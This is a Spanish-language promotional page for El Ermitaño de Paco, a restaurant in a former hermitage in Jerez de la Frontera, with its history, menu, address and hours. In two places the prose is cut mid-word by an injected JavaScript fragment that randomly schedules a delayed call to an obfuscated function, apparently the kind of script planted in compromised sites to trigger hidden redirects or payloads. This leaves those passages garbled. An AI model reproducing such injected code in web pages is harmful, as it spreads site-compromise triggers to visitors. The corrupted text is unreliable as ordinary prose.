Restaurante El Ermitaño

03062015155601917256Antes de su inauguración en agosto de 2002 y de convertirse en lo que a día de hoy es, un precioso restaurante, era una antigua Ermita, de ahí su nombre y su particular arquitectura.Cuenta con unas magníficas instalaciones, dos amplios salones, una soleada terraza, ideal para tomar un aperitivo aprovechandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando el sol que suele brillar en esta preciosa ciudad y una bonita torre que proporciona un espacio único para una cena romántica y en cuya base se encuentra un horno artesanal de leña, en el que se realizan deliciosos asados y algo de lo que se puede disfrutar en muy pocos restaurantes de la zona, como es un exquisito cochinillo asado al horno.La peculiar arquitectura del Ermitaño de Paco, hace que sea un lugar especial y único, con un ambiente realmente agradable, tanto por el personal que se encarga de mimar a los clientes, como por ese aire de paz y serenidad que se respira, lo cual ayuda a que se pueda mantener una conversación distendida y agradable con la familia o amigos.[presa] Volviendo a la cocina, sus fogones ofrecen una cocina tradicional, partiendo de las mejores materias primas, tanto de la zona, mariscos y pescados de la Bahía de Cádiz, como sabrosas carnes, con un cerdo ibérico traído directamente desde Cortegana y Jabuguillo (Huelva).Una cocina elaborada con sencillez y buen gusto. Muy recomendable, las almejas a la marinera y las gambas bechamel, que son un auténtico manjar.

EN LA CARTA ENCONTRARÁ:

03062015155606298884ENTRESMESES, MARISCOS Y PESCADOS.

Ensalada de mariscos, gambas blancas, jamón ibérico de bellota, langostinos de Sanlúcar, queso manchego viejo, almejas a la marinera, caña de lomo ibérica, fideos con almejas, gambas bechamel, calamares rellenos, croquetitas de jamón, calamares a la plancha, tortillitas de camarones, merluza, pavía de merluza, corvina, berenjenas con salmorejo, pargo, ensalada de cogollos, lubina, revuelto de espárragos, mero, revuelto de la casa, gazpacho andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andaluz. 

CARNES:
Carrillada ibérica, presa ibérica, pluma ibérica, solomillo de cerdo, solomillo de ternera, entrecot de ternera, mollejas a la plancha, solomillo de buey, parrilladas.

Todo ello regado con los mejores vinos generosos de provincia y magníficos tintos y blancos.

RESTAURANTE EL ERMITAÑO DE PACO
Av. La Granja s/n , frente a muñeco Michelin.
Jerez de la Frontera (Cádiz)
Teléfono reservas: 658795094Horario: de 8:00 a 00:00